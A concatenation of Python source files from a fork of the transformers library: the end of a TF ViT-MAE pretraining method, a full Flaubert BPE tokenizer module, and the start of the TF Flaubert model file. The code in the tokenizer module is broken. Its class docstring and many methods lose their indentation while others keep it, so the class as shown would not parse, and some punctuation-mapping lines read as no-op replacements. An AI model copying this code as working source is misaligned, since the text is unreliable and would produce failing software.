    @replace_return_docstrings(output_type=TFViTMAEForPreTrainingOutput, config_class=_CONFIG_FOR_DOC)
    def call(
        self,
        pixel_values: Optional[TFModelInputType] = None,
        noise: tf.Tensor = None,
        head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        training: bool = False,
    ) -> Union[TFViTMAEForPreTrainingOutput, Tuple[tf.Tensor]]:
        r"""
        Returns:
        Examples:
        ```python
        >>> from transformers import AutoImageProcessor, TFViTMAEForPreTraining
        >>> from PIL import Image
        >>> import requests
        >>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
        >>> image = Image.open(requests.get(url, stream=True).raw)
        >>> image_processor = AutoImageProcessor.from_pretrained("facebook/vit-mae-base")
        >>> model = TFViTMAEForPreTraining.from_pretrained("facebook/vit-mae-base")
        >>> inputs = image_processor(images=image, return_tensors="tf")
        >>> outputs = model(**inputs)
        >>> loss = outputs.loss
        >>> mask = outputs.mask
        >>> ids_restore = outputs.ids_restore
        ```"""
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        outputs = self.vit(
            pixel_values=pixel_values,
            noise=noise,
            head_mask=head_mask,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            training=training,
        )
        latent = outputs.last_hidden_state
        ids_restore = outputs.ids_restore
        mask = outputs.mask
        decoder_outputs = self.decoder(latent, ids_restore)  # [batch_size, num_patches, patch_size**2*3]
        logits = decoder_outputs.logits
        loss = self.forward_loss(pixel_values, logits, mask)
        if not return_dict:
            output = (logits, mask, ids_restore) + outputs[2:]
            return ((loss,) + output) if loss is not None else output
        return TFViTMAEForPreTrainingOutput(
            loss=loss,
            logits=logits,
            mask=mask,
            ids_restore=ids_restore,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
        )
    def serving_output(self, output: TFViTMAEForPreTrainingOutput) -> TFViTMAEForPreTrainingOutput:
        # NOTE(review): `loss` is not propagated to the serving output — confirm intentional.
        hidden_states = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
        attentions = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
        return TFViTMAEForPreTrainingOutput(
            logits=output.logits,
            mask=output.mask,
            ids_restore=output.ids_restore,
            hidden_states=hidden_states,
            attentions=attentions,
        )
|
27182812/ChatGLM-LLaMA-chinese-insturct | 23,947 | src/transformers/models/flaubert/tokenization_flaubert.py | # coding=utf-8
# Copyright 2019-present CNRS, Facebook Inc. and the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes for Flaubert."""
import json
import os
import re
import unicodedata
from typing import List, Optional, Tuple
from ...tokenization_utils import PreTrainedTokenizer
from ...utils import logging
logger = logging.get_logger(__name__)
# Names of the vocabulary files bundled with a pretrained tokenizer directory.
VOCAB_FILES_NAMES = {
    "vocab_file": "vocab.json",
    "merges_file": "merges.txt",
}
# Hub URLs of the vocab/merges files for each canonical Flaubert checkpoint.
PRETRAINED_VOCAB_FILES_MAP = {
    "vocab_file": {
        "flaubert/flaubert_small_cased": (
            "https://huggingface.co/flaubert/flaubert_small_cased/resolve/main/vocab.json"
        ),
        "flaubert/flaubert_base_uncased": (
            "https://huggingface.co/flaubert/flaubert_base_uncased/resolve/main/vocab.json"
        ),
        "flaubert/flaubert_base_cased": "https://huggingface.co/flaubert/flaubert_base_cased/resolve/main/vocab.json",
        "flaubert/flaubert_large_cased": (
            "https://huggingface.co/flaubert/flaubert_large_cased/resolve/main/vocab.json"
        ),
    },
    "merges_file": {
        "flaubert/flaubert_small_cased": (
            "https://huggingface.co/flaubert/flaubert_small_cased/resolve/main/merges.txt"
        ),
        "flaubert/flaubert_base_uncased": (
            "https://huggingface.co/flaubert/flaubert_base_uncased/resolve/main/merges.txt"
        ),
        "flaubert/flaubert_base_cased": "https://huggingface.co/flaubert/flaubert_base_cased/resolve/main/merges.txt",
        "flaubert/flaubert_large_cased": (
            "https://huggingface.co/flaubert/flaubert_large_cased/resolve/main/merges.txt"
        ),
    },
}
# Maximum input length (positional-embedding capacity) per checkpoint.
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
    "flaubert/flaubert_small_cased": 512,
    "flaubert/flaubert_base_uncased": 512,
    "flaubert/flaubert_base_cased": 512,
    "flaubert/flaubert_large_cased": 512,
}
# Default tokenizer kwargs per checkpoint (only the uncased checkpoint lowercases input).
PRETRAINED_INIT_CONFIGURATION = {
    "flaubert/flaubert_small_cased": {"do_lowercase": False},
    "flaubert/flaubert_base_uncased": {"do_lowercase": True},
    "flaubert/flaubert_base_cased": {"do_lowercase": False},
    "flaubert/flaubert_large_cased": {"do_lowercase": False},
}
def convert_to_unicode(text):
    """
    Converts `text` to Unicode (if it's not already), assuming UTF-8 input.

    `str` input is returned unchanged; `bytes` is decoded as UTF-8 with undecodable
    bytes silently dropped; any other type raises `TypeError`.
    """
    if isinstance(text, bytes):
        return text.decode("utf-8", "ignore")
    if isinstance(text, str):
        return text
    raise TypeError(f"not expecting type '{type(text)}'")
# Copied from transformers.models.xlm.tokenization_xlm.get_pairs
def get_pairs(word):
    """
    Return the set of adjacent symbol pairs in `word`, a tuple of variable-length
    string symbols.
    """
    _ = word[0]  # preserve the original's IndexError on an empty word
    return set(zip(word, word[1:]))
# Copied from transformers.models.xlm.tokenization_xlm.replace_unicode_punct
def replace_unicode_punct(text):
    """
    Port of https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/replace-unicode-punctuation.perl

    Maps fullwidth/CJK punctuation and digits to their ASCII equivalents.
    """
    text = text.replace(",", ",")
    # The ideographic full stop absorbs any following whitespace and becomes ". ".
    text = re.sub(r"。\s*", ". ", text)
    text = text.replace("、", ",")
    text = text.replace("”", '"')
    text = text.replace("“", '"')
    text = text.replace("∶", ":")
    text = text.replace(":", ":")
    text = text.replace("?", "?")
    text = text.replace("《", '"')
    text = text.replace("》", '"')
    text = text.replace(")", ")")
    text = text.replace("!", "!")
    text = text.replace("(", "(")
    text = text.replace(";", ";")
    text = text.replace("1", "1")
    text = text.replace("」", '"')
    text = text.replace("「", '"')
    text = text.replace("0", "0")
    text = text.replace("3", "3")
    text = text.replace("2", "2")
    text = text.replace("5", "5")
    text = text.replace("6", "6")
    text = text.replace("9", "9")
    text = text.replace("7", "7")
    text = text.replace("8", "8")
    text = text.replace("4", "4")
    # FIX: this sub must target the fullwidth stop "。" like the one above (and like the
    # Moses/XLM originals); a bare "." pattern matches *every* character and would turn
    # the whole string into dots.
    text = re.sub(r"。\s*", ". ", text)
    text = text.replace("~", "~")
    text = text.replace("’", "'")
    text = text.replace("…", "...")
    text = text.replace("━", "-")
    text = text.replace("〈", "<")
    text = text.replace("〉", ">")
    text = text.replace("【", "[")
    text = text.replace("】", "]")
    text = text.replace("%", "%")
    return text
# Copied from transformers.models.xlm.tokenization_xlm.remove_non_printing_char
def remove_non_printing_char(text):
    """
    Port of https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/remove-non-printing-char.perl

    Drops every character in the Unicode "C" (Other) categories: controls, format
    characters, surrogates, private-use and unassigned code points.
    """
    return "".join(char for char in text if not unicodedata.category(char).startswith("C"))
class FlaubertTokenizer(PreTrainedTokenizer):
"""
Construct a Flaubert tokenizer. Based on Byte-Pair Encoding. The tokenization process is the following:
- Moses preprocessing and tokenization.
- Normalizing all inputs text.
- The arguments `special_tokens` and the function `set_special_tokens`, can be used to add additional symbols (like
"__classify__") to a vocabulary.
- The argument `do_lowercase` controls lower casing (automatically set for pretrained vocabularies).
This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to
this superclass for more information regarding those methods.
Args:
vocab_file (`str`):
Vocabulary file.
merges_file (`str`):
Merges file.
do_lowercase (`bool`, *optional*, defaults to `False`):
Controls lower casing.
unk_token (`str`, *optional*, defaults to `"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
bos_token (`str`, *optional*, defaults to `"<s>"`):
The beginning of sequence token that was used during pretraining. Can be used a sequence classifier token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the `cls_token`.
</Tip>
sep_token (`str`, *optional*, defaults to `"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
pad_token (`str`, *optional*, defaults to `"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
cls_token (`str`, *optional*, defaults to `"</s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
mask_token (`str`, *optional*, defaults to `"<special1>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
additional_special_tokens (`List[str]`, *optional*, defaults to `["<special0>","<special1>","<special2>","<special3>","<special4>","<special5>","<special6>","<special7>","<special8>","<special9>"]`):
List of additional special tokens.
lang2id (`Dict[str, int]`, *optional*):
Dictionary mapping languages string identifiers to their IDs.
id2lang (`Dict[int, str]`, *optional*):
Dictionary mapping language IDs to their string identifiers.
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
    def __init__(
        self,
        vocab_file,
        merges_file,
        do_lowercase=False,
        unk_token="<unk>",
        bos_token="<s>",
        sep_token="</s>",
        pad_token="<pad>",
        cls_token="</s>",
        mask_token="<special1>",
        # NOTE(review): mutable default argument; safe only as long as it is never mutated.
        additional_special_tokens=[
            "<special0>",
            "<special1>",
            "<special2>",
            "<special3>",
            "<special4>",
            "<special5>",
            "<special6>",
            "<special7>",
            "<special8>",
            "<special9>",
        ],
        lang2id=None,
        id2lang=None,
        **kwargs,
    ):
        # Legacy XLM kwarg: accepted for compatibility but ignored (forced to False below).
        do_lowercase_and_remove_accent = kwargs.pop("do_lowercase_and_remove_accent", None)
        if do_lowercase_and_remove_accent is not None:
            logger.warning(
                "`do_lowercase_and_remove_accent` is passed as a keyword argument, but this won't do anything."
                " `FlaubertTokenizer` will always set it to `False`."
            )
        # always `False`
        self.do_lowercase_and_remove_accent = False
        self.do_lowercase = do_lowercase
        super().__init__(
            unk_token=unk_token,
            bos_token=bos_token,
            sep_token=sep_token,
            pad_token=pad_token,
            cls_token=cls_token,
            mask_token=mask_token,
            additional_special_tokens=additional_special_tokens,
            lang2id=lang2id,
            id2lang=id2lang,
            **kwargs,
        )
        # Moses preprocessing/tokenization is provided by the optional `sacremoses` package.
        try:
            import sacremoses
        except ImportError:
            raise ImportError(
                "You need to install sacremoses to use FlaubertTokenizer. "
                "See https://pypi.org/project/sacremoses/ for installation."
            )
        self.sm = sacremoses
        # cache of sm.MosesPunctNormalizer instance
        self.cache_moses_punct_normalizer = {}
        # cache of sm.MosesTokenizer instance
        self.cache_moses_tokenizer = {}
        # Languages that need a custom (non-Moses) word tokenizer.
        self.lang_with_custom_tokenizer = {"zh", "th", "ja"}
        self.lang2id = lang2id
        self.id2lang = id2lang
        if lang2id is not None and id2lang is not None:
            assert len(lang2id) == len(id2lang)
        # Lazily created in `ja_tokenize` (Japanese); `zh_word_tokenizer` is declared but unused here.
        self.ja_word_tokenizer = None
        self.zh_word_tokenizer = None
        # Vocabulary: token -> id (`encoder`) and the inverse mapping (`decoder`).
        with open(vocab_file, encoding="utf-8") as vocab_handle:
            self.encoder = json.load(vocab_handle)
        self.decoder = {v: k for k, v in self.encoder.items()}
        # BPE merge rules ranked by priority: lower rank merges earlier (see `bpe`).
        with open(merges_file, encoding="utf-8") as merges_handle:
            merges = merges_handle.read().split("\n")[:-1]
        merges = [tuple(merge.split()[:2]) for merge in merges]
        self.bpe_ranks = dict(zip(merges, range(len(merges))))
        # Memoization cache for `bpe`.
        self.cache = {}
    @property
    # Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.do_lower_case
    def do_lower_case(self):
        # NOTE(review): returns `do_lowercase_and_remove_accent` (always False for Flaubert,
        # see __init__), not `do_lowercase` — kept this way for XLM API compatibility.
        return self.do_lowercase_and_remove_accent
    # Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.moses_punct_norm
    def moses_punct_norm(self, text, lang):
        """Normalize punctuation with Moses, caching one `MosesPunctNormalizer` per language."""
        if lang not in self.cache_moses_punct_normalizer:
            punct_normalizer = self.sm.MosesPunctNormalizer(lang=lang)
            self.cache_moses_punct_normalizer[lang] = punct_normalizer
        else:
            punct_normalizer = self.cache_moses_punct_normalizer[lang]
        return punct_normalizer.normalize(text)
    # Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.moses_tokenize
    def moses_tokenize(self, text, lang):
        """Tokenize `text` with Moses, caching one `MosesTokenizer` per language.

        Returns a list of tokens (no XML escaping, aggressive dash splitting disabled by default).
        """
        if lang not in self.cache_moses_tokenizer:
            moses_tokenizer = self.sm.MosesTokenizer(lang=lang)
            self.cache_moses_tokenizer[lang] = moses_tokenizer
        else:
            moses_tokenizer = self.cache_moses_tokenizer[lang]
        return moses_tokenizer.tokenize(text, return_str=False, escape=False)
    # Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.moses_pipeline
    def moses_pipeline(self, text, lang):
        """Moses preprocessing chain: map unicode punctuation to ASCII, normalize
        punctuation for `lang`, then strip non-printing characters."""
        text = replace_unicode_punct(text)
        text = self.moses_punct_norm(text, lang)
        text = remove_non_printing_char(text)
        return text
    # Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.ja_tokenize
    def ja_tokenize(self, text):
        """Tokenize Japanese text with KyTea, lazily constructing the tokenizer on first use."""
        if self.ja_word_tokenizer is None:
            try:
                import Mykytea
                # Expects a KyTea model installed under ~/local/share/kytea/model.bin.
                self.ja_word_tokenizer = Mykytea.Mykytea(
                    f"-model {os.path.expanduser('~')}/local/share/kytea/model.bin"
                )
            except (AttributeError, ImportError):
                # Give actionable install instructions before re-raising.
                logger.error(
                    "Make sure you install KyTea (https://github.com/neubig/kytea) and it's python wrapper"
                    " (https://github.com/chezou/Mykytea-python) with the following steps"
                )
                logger.error("1. git clone git@github.com:neubig/kytea.git && cd kytea")
                logger.error("2. autoreconf -i")
                logger.error("3. ./configure --prefix=$HOME/local")
                logger.error("4. make && make install")
                logger.error("5. pip install kytea")
                raise
        return list(self.ja_word_tokenizer.getWS(text))
    @property
    # Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.vocab_size
    def vocab_size(self):
        """Size of the base vocabulary (excluding added tokens)."""
        return len(self.encoder)
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.get_vocab
def get_vocab(self):
return dict(self.encoder, **self.added_tokens_encoder)
    # Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.bpe
    def bpe(self, token):
        """Apply byte-pair encoding to a single token.

        Returns the BPE segmentation as a space-joined string whose last symbol carries
        the `</w>` end-of-word marker. Results are memoized in `self.cache`.
        """
        # Represent the word as a tuple of symbols, tagging the last character as word-final.
        word = tuple(token[:-1]) + (token[-1] + "</w>",)
        if token in self.cache:
            return self.cache[token]
        pairs = get_pairs(word)
        if not pairs:
            # Single-symbol token: nothing to merge.
            return token + "</w>"
        while True:
            # Greedily merge the adjacent pair with the lowest (best) merge rank.
            bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf")))
            if bigram not in self.bpe_ranks:
                break
            first, second = bigram
            new_word = []
            i = 0
            while i < len(word):
                try:
                    j = word.index(first, i)
                except ValueError:
                    new_word.extend(word[i:])
                    break
                else:
                    new_word.extend(word[i:j])
                    i = j
                if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
                    # Found the bigram: collapse it into one merged symbol.
                    new_word.append(first + second)
                    i += 2
                else:
                    new_word.append(word[i])
                    i += 1
            new_word = tuple(new_word)
            word = new_word
            if len(word) == 1:
                break
            else:
                pairs = get_pairs(word)
        word = " ".join(word)
        if word == "\n </w>":
            # Special-case newline so its end-of-word marker stays attached.
            word = "\n</w>"
        self.cache[token] = word
        return word
def preprocess_text(self, text):
text = text.replace("``", '"').replace("''", '"')
text = convert_to_unicode(text)
text = unicodedata.normalize("NFC", text)
if self.do_lowercase:
text = text.lower()
return text
def _tokenize(self, text, bypass_tokenizer=False):
"""
Tokenize a string given language code using Moses.
Details of tokenization:
- [sacremoses](https://github.com/alvations/sacremoses): port of Moses
- Install with `pip install sacremoses`
Args:
- bypass_tokenizer: Allow users to preprocess and tokenize the sentences externally (default = False)
(bool). If True, we only apply BPE.
Returns:
List of tokens.
"""
lang = "fr"
if lang and self.lang2id and lang not in self.lang2id:
logger.error(
"Supplied language code not found in lang2id mapping. Please check that your language is supported by"
" the loaded pretrained model."
)
if bypass_tokenizer:
text = text.split()
else:
text = self.preprocess_text(text)
text = self.moses_pipeline(text, lang=lang)
text = self.moses_tokenize(text, lang=lang)
split_tokens = []
for token in text:
if token:
split_tokens.extend(list(self.bpe(token).split(" ")))
return split_tokens
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer._convert_token_to_id
def _convert_token_to_id(self, token):
"""Converts a token (str) in an id using the vocab."""
return self.encoder.get(token, self.encoder.get(self.unk_token))
    # Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer._convert_id_to_token
    def _convert_id_to_token(self, index):
        """Converts an index (integer) in a token (str) using the vocab; unknown ids map to `unk_token`."""
        return self.decoder.get(index, self.unk_token)
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.convert_tokens_to_string
def convert_tokens_to_string(self, tokens):
"""Converts a sequence of tokens (string) in a single string."""
out_string = "".join(tokens).replace("</w>", " ").strip()
return out_string
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.build_inputs_with_special_tokens
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. An XLM sequence has the following format:
- single sequence: `<s> X </s>`
- pair of sequences: `<s> A </s> B </s>`
Args:
token_ids_0 (`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
"""
bos = [self.bos_token_id]
sep = [self.sep_token_id]
if token_ids_1 is None:
return bos + token_ids_0 + sep
return bos + token_ids_0 + sep + token_ids_1 + sep
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.get_special_tokens_mask
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer `prepare_for_model` method.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (`bool`, *optional*, defaults to `False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
if token_ids_1 is not None:
return [1] + ([0] * len(token_ids_0)) + [1] + ([0] * len(token_ids_1)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1]
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.create_token_type_ids_from_sequences
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. An XLM sequence
pair mask has the following format:
```
0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1
| first sequence | second sequence |
```
If `token_ids_1` is `None`, this method only returns the first portion of the mask (0s).
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [token type IDs](../glossary#token-type-ids) according to the given sequence(s).
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1]
    # Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.save_vocabulary
    def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
        """Write the vocabulary (as JSON) and the BPE merges file to `save_directory`.

        Returns the `(vocab_file, merges_file)` paths, or `None` when `save_directory`
        is not an existing directory.
        """
        if not os.path.isdir(save_directory):
            logger.error(f"Vocabulary path ({save_directory}) should be a directory")
            return
        vocab_file = os.path.join(
            save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
        )
        merge_file = os.path.join(
            save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"]
        )
        with open(vocab_file, "w", encoding="utf-8") as f:
            f.write(json.dumps(self.encoder, indent=2, sort_keys=True, ensure_ascii=False) + "\n")
        index = 0
        with open(merge_file, "w", encoding="utf-8") as writer:
            # Merges are written one per line in rank order; warn if ranks are not contiguous.
            for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
                if index != token_index:
                    logger.warning(
                        f"Saving vocabulary to {merge_file}: BPE merge indices are not consecutive."
                        " Please check that the tokenizer is not corrupted!"
                    )
                    index = token_index
                writer.write(" ".join(bpe_tokens) + "\n")
                index += 1
        return vocab_file, merge_file
# Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.__getstate__
def __getstate__(self):
state = self.__dict__.copy()
state["sm"] = None
return state
    # Copied from transformers.models.xlm.tokenization_xlm.XLMTokenizer.__setstate__
    def __setstate__(self, d):
        """Restore pickled state and re-import sacremoses (dropped in `__getstate__`)."""
        self.__dict__ = d
        try:
            import sacremoses
        except ImportError:
            raise ImportError(
                "You need to install sacremoses to use XLMTokenizer. "
                "See https://pypi.org/project/sacremoses/ for installation."
            )
        self.sm = sacremoses
|
27182812/ChatGLM-LLaMA-chinese-insturct | 56,749 | src/transformers/models/flaubert/modeling_tf_flaubert.py | # coding=utf-8
# Copyright 2019-present, Facebook, Inc and the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
TF 2.0 Flaubert model.
"""
import itertools
import random
import warnings
from dataclasses import dataclass
from typing import Dict, Optional, Tuple, Union
import numpy as np
import tensorflow as tf
from ...activations_tf import get_tf_activation
from ...modeling_tf_outputs import (
TFBaseModelOutput,
TFMultipleChoiceModelOutput,
TFQuestionAnsweringModelOutput,
TFSequenceClassifierOutput,
TFTokenClassifierOutput,
)
from ...modeling_tf_utils import (
TFModelInputType,
TFMultipleChoiceLoss,
TFPreTrainedModel,
TFQuestionAnsweringLoss,
TFSequenceClassificationLoss,
TFSequenceSummary,
TFSharedEmbeddings,
TFTokenClassificationLoss,
get_initializer,
keras_serializable,
unpack_inputs,
)
from ...tf_utils import shape_list, stable_softmax
from ...utils import (
MULTIPLE_CHOICE_DUMMY_INPUTS,
ModelOutput,
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
)
from .configuration_flaubert import FlaubertConfig
logger = logging.get_logger(__name__)
_CHECKPOINT_FOR_DOC = "flaubert/flaubert_base_cased"
_CONFIG_FOR_DOC = "FlaubertConfig"
TF_FLAUBERT_PRETRAINED_MODEL_ARCHIVE_LIST = [
# See all Flaubert models at https://huggingface.co/models?filter=flaubert
]
FLAUBERT_START_DOCSTRING = r"""
This model inherits from [`TFPreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a [tf.keras.Model](https://www.tensorflow.org/api_docs/python/tf/keras/Model) subclass. Use it
as a regular TF 2.0 Keras Model and refer to the TF 2.0 documentation for all matter related to general usage and
behavior.
<Tip>
TensorFlow models and layers in `transformers` accept two formats as input:
- having all inputs as keyword arguments (like PyTorch models), or
- having all inputs as a list, tuple or dict in the first positional argument.
The reason the second format is supported is that Keras methods prefer this format when passing inputs to models
and layers. Because of this support, when using methods like `model.fit()` things should "just work" for you - just
pass your inputs and labels in any format that `model.fit()` supports! If, however, you want to use the second
format outside of Keras methods like `fit()` and `predict()`, such as when creating your own layers or models with
the Keras `Functional` API, there are three possibilities you can use to gather all the input Tensors in the first
positional argument:
- a single Tensor with `input_ids` only and nothing else: `model(input_ids)`
- a list of varying length with one or several input Tensors IN THE ORDER given in the docstring:
`model([input_ids, attention_mask])` or `model([input_ids, attention_mask, token_type_ids])`
- a dictionary with one or several input Tensors associated to the input names given in the docstring:
`model({"input_ids": input_ids, "token_type_ids": token_type_ids})`
Note that when creating models and layers with
[subclassing](https://keras.io/guides/making_new_layers_and_models_via_subclassing/) then you don't need to worry
about any of this, as you can just pass inputs like you would to any other Python function!
</Tip>
Parameters:
config ([`FlaubertConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
FLAUBERT_INPUTS_DOCSTRING = r"""
Args:
input_ids (`Numpy array` or `tf.Tensor` of shape `(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.__call__`] and
[`PreTrainedTokenizer.encode`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`Numpy array` or `tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- `1` for tokens that are **not masked**,
- `0` for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
langs (`tf.Tensor` or `Numpy array` of shape `(batch_size, sequence_length)`, *optional*):
A parallel sequence of tokens to be used to indicate the language of each token in the input. Indices are
languages ids which can be obtained from the language names by using two conversion mappings provided in
the configuration of the model (only provided for multilingual models). More precisely, the *language name
to language id* mapping is in `model.config.lang2id` (which is a dictionary string to int) and the
*language id to language name* mapping is in `model.config.id2lang` (dictionary int to string).
See usage examples detailed in the [multilingual documentation](../multilingual).
token_type_ids (`tf.Tensor` or `Numpy array` of shape `(batch_size, sequence_length)`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- `0` corresponds to a *sentence A* token,
- `1` corresponds to a *sentence B* token.
[What are token type IDs?](../glossary#token-type-ids)
position_ids (`tf.Tensor` or `Numpy array` of shape `(batch_size, sequence_length)`, *optional*):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,
config.max_position_embeddings - 1]`.
[What are position IDs?](../glossary#position-ids)
lengths (`tf.Tensor` or `Numpy array` of shape `(batch_size,)`, *optional*):
Length of each sentence that can be used to avoid performing attention on padding token indices. You can
also use *attention_mask* for the same result (see above), kept here for compatibility Indices selected in
`[0, ..., input_ids.size(-1)]`:
cache (`Dict[str, tf.Tensor]`, *optional*):
Dictionary string to `tf.FloatTensor` that contains precomputed hidden states (key and values in the
attention blocks) as computed by the model (see `cache` output below). Can be used to speed up sequential
decoding.
The dictionary object will be modified in-place during the forward pass to add newly computed
hidden-states.
head_mask (`Numpy array` or `tf.Tensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- `1` indicates the head is **not masked**,
- `0` indicates the head is **masked**.
inputs_embeds (`tf.Tensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
is useful if you want more control over how to convert `input_ids` indices into associated vectors than the
model's internal embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail. This argument can be used only in eager mode, in graph mode the value in the
config will be used instead.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail. This argument can be used only in eager mode, in graph mode the value in the config will be
used instead.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. This argument can be used in
eager mode, in graph mode the value will always be set to True.
training (`bool`, *optional*, defaults to `False`):
Whether or not to use the model in training mode (some modules like dropout modules have different
behaviors between training and evaluation).
"""
def get_masks(slen, lengths, causal, padding_mask=None):
    """
    Generate the hidden-states (padding) mask and, optionally, a causal attention mask.

    Args:
        slen: Sequence length of the batch.
        lengths: `tf.Tensor` of shape `(bs,)` with the real length of each sequence.
        causal: If True, also build a lower-triangular `(bs, slen, slen)` attention mask.
        padding_mask: Optional precomputed `(bs, slen)` padding mask; when given it is
            used directly instead of being derived from `lengths`.

    Returns:
